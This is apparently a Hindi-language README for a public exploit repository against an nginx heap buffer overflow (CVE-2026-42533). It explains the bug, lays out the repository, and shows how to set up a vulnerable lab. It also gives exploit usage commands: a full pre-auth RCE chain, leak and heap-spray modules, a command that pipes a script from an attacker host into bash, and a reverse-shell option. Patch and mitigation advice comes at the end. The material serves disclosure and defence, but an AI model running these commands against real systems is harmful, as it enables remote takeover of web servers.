
nginx हीप बफर ओवरफ्लो (CVE-2026-42533) के लिए एक्सप्लॉइट जो टू-पास कैप्चर क्लोबरिंग के माध्यम से प्री-ऑथ RCE प्रदान करता है। इसमें इंफो लीक, हीप स्प्रे और रिवर्स शेल मॉड्यूल शामिल हैं।
टू-पास कैप्चर क्लोबरिंग के माध्यम से प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन
सार्वजनिक PoC 2026-07-27 को जारी — प्रतीक्षा न करें, अभी पैच करें।
| CVE | CVE-2026-42533 |
| CVSS 4.0 | 9.2 (गंभीर) |
| प्रकार | हीप बफर ओवरफ्लो (CWE-122) |
| प्रभावित | nginx 0.9.6 – 1.30.3 (stable), 0.9.6 – 1.31.2 (mainline) |
| फिक्स | nginx 1.30.4 / 1.31.3, NGINX Plus R36 P7 / 37.0.3.1 |
| खुलासा | 2026-07-15 (F5 / NGINX) |
| PoC रिलीज़ | 2026-07-27 |
| शोधकर्ता | Stan Shaw (0xCyberstan) |
| प्लेटफ़ॉर्म | डायग्नोस्टिक | ओवरफ्लो | क्रैश | जानकारी लीक |
|---|---|---|---|---|
| Ubuntu 24.04 x86_64 | ✅ | ✅ | ✅ SIGABRT | ⚠️ आंशिक |
CVE-2026-42533, nginx के टू-पास स्ट्रिंग मूल्यांकन इंजन में एक गंभीर हीप बफर ओवरफ्लो है। जब कोई regex-आधारित map निर्देश क्रमांकित कैप्चर समूहों ($1, $2, आदि) के साथ इंटरैक्ट करता है, तो साझा r->captures संरचना LEN (माप) और VALUE (लेखन) पासों के बीच चुपचाप अधिलेखित हो जाती है। इससे आकार बेमेल उत्पन्न होता है:
एक साथ जुड़कर, ये दो प्रिमिटिव विश्वसनीय प्री-ऑथ RCE को सक्षम करते हैं, ASLR को पराजित करते हुए — Ubuntu 24.04 पर 10/10 विश्वसनीयता के साथ प्रदर्शित।
┌─────────────────────────────────────────────────────────────┐
│ LEN PASS (measure) │
│ $1 from location ~ ^/api/(...)$ = "abc" → measures 3 bytes│
│ $overflow_gadget = giant_header → measures 5000 bytes │
│ Buffer allocated: 5003 bytes │
│ │
│ [ $overflow_gadget triggers map regex → clobbers $1 ] │
│ $1 now = giant_header (5000 bytes) │
│ │
│ VALUE PASS (write) │
│ $1 writes 5000 bytes (LEN said 3!) → OVERFLOW! │
│ $overflow_gadget writes 5000 bytes │
│ Total written: 10000 bytes into 5003-byte buffer │
│ → 4997 bytes overflow into adjacent heap │
└─────────────────────────────────────────────────────────────┘
ओवरफ्लो आसन्न हीप संरचनाओं को दूषित करता है। प्राथमिक लक्ष्य ngx_pool_cleanup_t है:
struct ngx_pool_cleanup_s {
ngx_pool_cleanup_pt handler; // function pointer → overwrite for RIP control
void *data; // argument to handler
ngx_pool_cleanup_t *next; // next in chain
};
जब कनेक्शन पूल नष्ट किया जाता है, तो handler(data) को कॉल किया जाता है → मनमाना कोड निष्पादन।
CVE-2026-42533/
├── exploit/
│ ├── exploit.py # Full exploit chain (leak → spray → overflow → RCE)
│ ├── leak.py # Info leak module (heap/libc pointer leak)
│ ├── overflow.py # Heap overflow module (crash / RCE trigger)
│ ├── analyze.py # GDB analysis helper for offset determination
│ └── requirements.txt # Python dependencies
├── nginx/
│ └── nginx.conf # Vulnerable nginx configuration
├── Dockerfile # Docker build for test environment (Ubuntu 24.04)
├── docker-compose.yml # Docker Compose for easy deployment
└── README.md
requests के साथ Python 3.8+# Diagnostic mode — shows two-pass mismatch (safe, no crash)
python3 exploit/overflow.py <target> --diagnose
आउटपुट:
header= 10: LEN= 13 actual= 13 internal_overflow= 7 ✓
header= 100: LEN= 103 actual= 103 internal_overflow= 97 ✓
header= 1000: LEN= 1003 actual= 1003 internal_overflow= 997 ✓
python3 exploit/overflow.py <target> --crash
Ubuntu 24.04 पर परिणाम:
worker process 12282 exited on signal 6 (core dumped)
free(): invalid next size (normal)
# Ubuntu 24.04 (confirmed working)
ssh root@<your-server>
apt-get install -y build-essential libpcre2-dev libssl-dev zlib1g-dev
wget https://nginx.org/download/nginx-1.27.4.tar.gz
tar xzf nginx-1.27.4.tar.gz && cd nginx-1.27.4
./configure --prefix=/usr/local/nginx --with-cc-opt='-g -O0'
make -j$(nproc) && make install
# Copy vulnerable config
cp nginx/nginx.conf /usr/local/nginx/conf/nginx.conf
/usr/local/nginx/sbin/nginx
# Run exploit from your machine
python3 exploit/overflow.py <server-ip> --diagnose
docker compose up -d --build
python3 exploit/overflow.py localhost --port 8080 --diagnose
python3 exploit/exploit.py <target> [options]
# Examples:
python3 exploit/exploit.py 192.168.1.100 # full auto
python3 exploit/exploit.py 192.168.1.100 --leak-only # recon only
python3 exploit/exploit.py 192.168.1.100 --crash # verify vuln
python3 exploit/exploit.py 192.168.1.100 --cmd "id > /tmp/pwned"
# Manual mode (if you have pre-leaked addresses)
python3 exploit/exploit.py 192.168.1.100 \
--libc 0x7f1234000000 \
--heap 0x5a1234000000 \
--cmd "curl http://attacker/shell.sh | bash"
# Reverse shell
python3 exploit/exploit.py 192.168.1.100 \
--reverse-shell --lhost 10.0.0.1 --lport 4444
python3 exploit/leak.py <target> [options]
# Quiet mode (just output addresses)
python3 exploit/leak.py 192.168.1.100 -q
# LIBC:0x7f1234567890
# HEAP:0x5a1234567890
python3 exploit/overflow.py <target> --crash # crash worker (PoC)
python3 exploit/overflow.py <target> --spray # heap spray only
एक्सप्लॉइट के लिए nginx कॉन्फ़िगरेशन में इस विशिष्ट पैटर्न की आवश्यकता होती है:
# 1. A regex-based map (clobbers capture state)
map $http_x_overflow $overflow_gadget {
"~^(.+)$" $1; # regex match overwrites $1
default "";
}
# 2. A regex location (creates captures)
server {
location ~ ^/api/(...)$ { # creates $1, $2, ...
# 3. Both capture AND map variable in same directive
return 200 "$1$overflow_gadget"; # ← two-pass sink
}
}
सार्वजनिक स्कैनर का उपयोग करके कमजोर कॉन्फ़िग्स का पता लगाएं:
Worker PID: 12282
[Phase 1] Diagnostic:
header=100: LEN=103, response=103 ✓
header=1000: LEN=1003, response=1003 ✓ (997 byte internal overflow!)
[Phase 2] Heap Corruption:
8000-byte header → VALUE writes 16000 bytes into 8003-byte buffer
→ 7997 bytes overflow past buffer boundary
Worker PID: 12331 (NEW — old worker DEAD!)
Error log:
free(): invalid next size (normal)
worker process 12282 exited on signal 6 (core dumped)
# Upgrade to patched versions:
# nginx 1.30.4+ (stable) / 1.31.3+ (mainline)
# NGINX Plus R36 P7 / 37.0.3.1
map निर्देशों में क्रमांकित कैप्चर को नामित कैप्चर से बदलें:
# VULNERABLE
map $http_foo $bar {
"~^(.+)$" $1; # numbered capture → clobbers shared state
}
# MITIGATED
map $http_foo $bar {
"~^(?<val>.+)$" $val; # named capture → isolated
}
nginx -v (≥ 1.30.4 या ≥ 1.31.3 होना चाहिए)